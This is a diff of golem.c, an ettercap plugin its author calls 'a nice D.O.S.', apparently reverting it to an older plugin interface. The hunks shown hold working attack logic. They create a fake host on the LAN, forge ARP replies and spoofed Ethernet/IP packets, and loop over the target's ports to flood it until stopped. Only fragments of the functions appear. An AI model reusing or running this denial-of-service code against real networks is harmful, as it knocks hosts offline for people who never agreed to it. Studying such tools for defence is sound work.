@@ -2,7 +2,7 @@
     golem -- ettercap plugin --  a nice D.O.S. :)
 
     Copyright (C) 2001  NaGoR
-    
+
     This program is free software; you can redistribute it and/or modify
     it under the terms of the GNU General Public License as published by
     the Free Software Foundation; either version 2 of the License, or
@@ -17,16 +17,10 @@
     along with this program; if not, write to the Free Software
     Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 
-    $Id: golem.c,v 1.8 2002/10/01 21:40:53 alor Exp $
+    $Id: golem.c,v 1.2 2001/08/31 13:32:28 alor Exp $
 */
-#ifdef CYGWIN
-   #include <windows.h>
-   #include <winsock2.h> 
-#else
-   #include <sys/types.h>
-   #include <sys/time.h>
-#endif
 
+#include <sys/types.h>
 #include <sys/ipc.h>
 #include <sys/shm.h>
 #include <signal.h>
@@ -35,12 +29,17 @@
 #include <time.h>
 
 #include "../../src/include/ec_main.h"
-#include "../../src/include/ec_version.h"
 #include "../../src/include/ec_plugins.h"
 #include "../../src/include/ec_inet_structures.h"
 #include "../../src/include/ec_inet.h"
 #include "../../src/include/ec_inet_forge.h"
 
+char Ettercap_Version[] = VERSION;                       // required -- for compatibility
+
+char PlugIn_Info[] = "nice D.O.S.  BE CAREFUL !!";
+
+short PlugIn_Version = 18;
+
 
 #define SYN_SEQ 0xabadc0de
 
@@ -53,38 +52,13 @@ unsigned char MACS[6];
 unsigned char MACD[6];
 char *pck_to_send;
 
-// protos...
+// protos..
 
-int Plugin_Init(void *);
-int Plugin_Fini(void *);
-int golemizer(void *dummy);
 void Parse_packet(char *buffer);
 int Fake_Host(void);
+void PlugIn_Start(char**argv);
 
-// plugin operation
-
-struct plugin_ops golem_ops = {
-   ettercap_version: VERSION,
-   plug_info:        "nice D.O.S.  BE CAREFUL !!",
-   plug_version:     19,
-   plug_type:        PT_EXT,
-   hook_point:       HOOK_NONE,
-   hook_function:    &golemizer,
-};
-
-//==================================
-
-int Plugin_Init(void *params)
-{
-   return Plugin_Register(params, &golem_ops);
-}
-
-int Plugin_Fini(void *params)
-{
-   return 0;
-}
-
-// =================================
+// ---------------------------
 
 void Parse_packet(char *buffer)
 {
@@ -144,31 +118,25 @@ int Fake_Host(void)
 
 
 
-int golemizer(void *dummy)
+void PlugIn_Start(char**argv)
 {
     int key, i;
-    char cont[10];
+    char cont[5];
 
     if (!strcmp(Host_Dest.ip,""))
     {
       Plugin_Output("Please select a Dest...\n");
-      return 0;
+      return;
     }
 
-    if (number_of_connections != -1)
-    {
-      Plugin_Output("This plugin can't be used from connection list interface !!\n");
-      return 0;
-    }
-
-    memset(cont, 0, 10);
+    memset(cont, 0, 5);
 
     Plugin_Output("\nAre you sure you want to Golemize %s ? (yes/no) ", Host_Dest.ip );
-    Plugin_Input(cont, 5, P_BLOCK);
+    Plugin_Input(cont, 4, P_BLOCK);
     if (strncmp(cont, "yes", 3))  // not sure... ;)
     {
       Plugin_Output("\nIt is safe!  for now...\n");
-      return 0;
+      return;
     }
 
     Plugin_Output("Building host list for netmask %s, please wait...\n", Inet_MySubnet());
@@ -183,7 +151,7 @@ int golemizer(void *dummy)
     {
       Plugin_Output("I can't find an unused IP in this LAN.\n");
       Plugin_Output("I can't create the Fake Host\n");
-      return 0;
+      return;
     }
     IPD = inet_addr(Host_Dest.ip);
 
@@ -201,6 +169,8 @@ int golemizer(void *dummy)
 
     if (! (CID1=fork()) )
     {
+       strcpy(program_argv0, "golem");
+
          pck_to_send = (char *)Inet_Forge_packet( ETH_HEADER + ARP_HEADER );
          Inet_Forge_ethernet( pck_to_send, MACS, MACD, ETH_P_ARP );
          Inet_Forge_arp( pck_to_send+ETH_HEADER, ARPOP_REPLY, MACS, IPS, MACD, IPD);
@@ -218,6 +188,8 @@ int golemizer(void *dummy)
     {
          char *recv_pck;
 
+          strcpy(program_argv0, "golem");
+
          for (i=1; i<1000; i++)
          {
             Inet_Forge_ethernet( pck_to_send, MACS, MACD, ETH_P_IP );
@@ -250,7 +222,8 @@ int golemizer(void *dummy)
           Plugin_Output("\nD.O.S.ing: %s  from fake host: %s\n", Host_Dest.ip, inet_ntoa(fake));
           Plugin_Output("\nPress return to stop...\n\n");
 
-         LOOP {
+         loop
+         {
             for (ind=0; ind<(*port_index); ind++)
             {
 
@@ -274,7 +247,7 @@ int golemizer(void *dummy)
                kill(CID2,SIGTERM);
                Inet_Forge_packet_destroy( pck_to_send );
                Inet_CloseRawSock(sock);
-               return 0;
+               return;
             }
          }
     }
